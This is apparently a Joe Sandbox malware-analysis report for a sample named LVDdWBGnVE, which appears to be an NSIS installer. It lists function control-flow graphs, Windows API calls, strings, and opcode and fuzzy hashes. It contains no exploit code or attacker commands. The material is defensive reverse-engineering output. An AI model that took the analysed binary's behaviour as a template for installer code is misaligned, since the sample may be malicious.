                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                                • API String ID: 4286501637-2478300759
                                                • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                Function 0040337F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 175fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 587 40337f-403398 588 4033a1-4033a9 587->588 589 40339a 587->589 590 4033b2-4033b7 588->590 591 4033ab 588->591 589->588 592 4033c7-4033d4 call 403336 590->592 593 4033b9-4033c2 call 403368 590->593 591->590 597 4033d6 592->597 598 4033de-4033e5 592->598 593->592 599 4033d8-4033d9 597->599 600 403546-403548 598->600 601 4033eb-403432 GetTickCount 598->601 604 403567-40356b 599->604 602 40354a-40354d 600->602 603 4035ac-4035af 600->603 605 403564 601->605 606 403438-403440 601->606 607 403552-40355b call 403336 602->607 608 40354f 602->608 609 4035b1 603->609 610 40356e-403574 603->610 605->604 611 403442 606->611 612 403445-403453 call 403336 606->612 607->597 620 403561 607->620 608->607 609->605 615 403576 610->615 616 403579-403587 call 403336 610->616 611->612 612->597 621 403455-40345e 612->621 615->616 616->597 624 40358d-40359f WriteFile 616->624 620->605 623 403464-403484 call 4076a0 621->623 630 403538-40353a 623->630 631 40348a-40349d GetTickCount 623->631 626 4035a1-4035a4 624->626 627 40353f-403541 624->627 626->627 629 4035a6-4035a9 626->629 627->599 629->603 630->599 632 4034e8-4034ec 631->632 633 40349f-4034a7 631->633 634 40352d-403530 632->634 635 4034ee-4034f1 632->635 636 4034a9-4034ad 633->636 637 4034af-4034e0 MulDiv wsprintfW call 404f9e 633->637 634->606 641 403536 634->641 639 403513-40351e 635->639 640 4034f3-403507 WriteFile 635->640 636->632 636->637 642 4034e5 637->642 644 403521-403525 639->644 640->627 643 403509-40350c 640->643 641->605 642->632 643->627 645 40350e-403511 643->645 644->623 646 40352b 644->646 645->644 646->605
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 004033F1
                                                • GetTickCount.KERNEL32 ref: 00403492
                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                • wsprintfW.USER32 ref: 004034CE
                                                • WriteFile.KERNELBASE(00000000,00000000,00427576,00403792,00000000), ref: 004034FF
                                                • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: CountFileTickWrite$wsprintf
                                                • String ID: (]C$... %d%%$pAB$v5B$vuB
                                                • API String ID: 651206458-2852903789
                                                • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 647 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 650 403603-403608 647->650 651 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 647->651 652 4037e2-4037e6 650->652 659 403641 651->659 660 403728-403736 call 4032d2 651->660 662 403646-40365d 659->662 666 4037f1-4037f6 660->666 667 40373c-40373f 660->667 664 403661-403663 call 403336 662->664 665 40365f 662->665 671 403668-40366a 664->671 665->664 666->652 669 403741-403759 call 403368 call 403336 667->669 670 40376b-403795 GlobalAlloc call 403368 call 40337f 667->670 669->666 698 40375f-403765 669->698 670->666 696 403797-4037a8 670->696 674 403670-403677 671->674 675 4037e9-4037f0 call 4032d2 671->675 676 4036f3-4036f7 674->676 677 403679-40368d call 405e38 674->677 675->666 683 403701-403707 676->683 684 4036f9-403700 call 4032d2 676->684 677->683 694 40368f-403696 677->694 687 403716-403720 683->687 688 403709-403713 call 4072ad 683->688 684->683 687->662 695 403726 687->695 688->687 694->683 700 403698-40369f 694->700 695->660 701 4037b0-4037b3 696->701 702 4037aa 696->702 698->666 698->670 700->683 703 4036a1-4036a8 700->703 704 4037b6-4037be 701->704 702->701 703->683 705 4036aa-4036b1 703->705 704->704 706 4037c0-4037db SetFilePointer call 405e38 704->706 705->683 707 4036b3-4036d3 705->707 710 4037e0 706->710 707->666 709 4036d9-4036dd 707->709 711 4036e5-4036ed 709->711 712 4036df-4036e3 709->712 710->652 711->683 713 4036ef-4036f1 711->713 712->695 712->711 713->683
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 004035C4
                                                • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                Strings
                                                • Error launching installer, xrefs: 00403603
                                                • Inst, xrefs: 00403698
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                • Null, xrefs: 004036AA
                                                • soft, xrefs: 004036A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                • API String ID: 4283519449-527102705
                                                • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                APIs
                                                • lstrlenW.KERNEL32(00445D80,00427576,762323A0,00000000), ref: 00404FD6
                                                • lstrlenW.KERNEL32(004034E5,00445D80,00427576,762323A0,00000000), ref: 00404FE6
                                                • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427576,762323A0,00000000), ref: 00404FF9
                                                • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427576,762323A0,00000000), ref: 00406902
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                • String ID:
                                                • API String ID: 2740478559-0
                                                • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f7b GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 750 4030e3-4030f2 732->750 751 402387-40238d GlobalFree 732->751 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 742->750 762 402708-40270e 747->762 751->750 762->750
                                                APIs
                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                • GlobalFree.KERNELBASE(006FC9A8), ref: 00402387
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: FreeGloballstrcpyn
                                                • String ID: Exch: stack < %d elements$Pop: stack empty$open
                                                • API String ID: 1459762280-1711415406
                                                • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 764 4022fd-402325 call 40145c GetFileVersionInfoSizeW 767 4030e3-4030f2 764->767 768 40232b-402339 GlobalAlloc 764->768 768->767 770 40233f-40234e GetFileVersionInfoW 768->770 772 402350-402367 VerQueryValueW 770->772 773 402384-40238d GlobalFree 770->773 772->773 774 402369-402381 call 405f7d * 2 772->774 773->767 774->773
                                                APIs
                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                • GlobalFree.KERNELBASE(006FC9A8), ref: 00402387
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                • String ID:
                                                • API String ID: 3376005127-0
                                                • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                                • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 780 402b23-402b37 GlobalAlloc 781 402b39-402b49 call 401446 780->781 782 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 780->782 787 402b70-402b73 781->787 782->787 788 402b93 787->788 789 402b75-402b8d call 405f96 WriteFile 787->789 791 4030e3-4030f2 788->791 789->788 795 402384-40238d GlobalFree 789->795 795->791
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                • String ID:
                                                • API String ID: 2568930968-0
                                                • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 797 402713-40273b call 406035 * 2 802 402746-402749 797->802 803 40273d-402743 call 40145c 797->803 805 402755-402758 802->805 806 40274b-402752 call 40145c 802->806 803->802 809 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 805->809 810 40275a-402761 call 40145c 805->810 806->805 810->809
                                                APIs
                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringWritelstrcpyn
                                                • String ID: <RM>$WriteINIStr: wrote [%s] %s=%s in %s$open
                                                • API String ID: 247603264-1827671502
                                                • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 818 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 829 402223-4030f2 call 4062cf 818->829 830 40220d-40221b call 4062cf 818->830 830->829
                                                APIs
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427576,762323A0,00000000), ref: 00404FD6
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427576,762323A0,00000000), ref: 00404FE6
                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427576,762323A0,00000000), ref: 00404FF9
                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                Strings
                                                • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                • API String ID: 3156913733-2180253247
                                                • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 838 405eab-405eb7 839 405eb8-405eec GetTickCount GetTempFileNameW 838->839 840 405efb-405efd 839->840 841 405eee-405ef0 839->841 843 405ef5-405ef8 840->843 841->839 842 405ef2 841->842 842->843
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405EC9
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
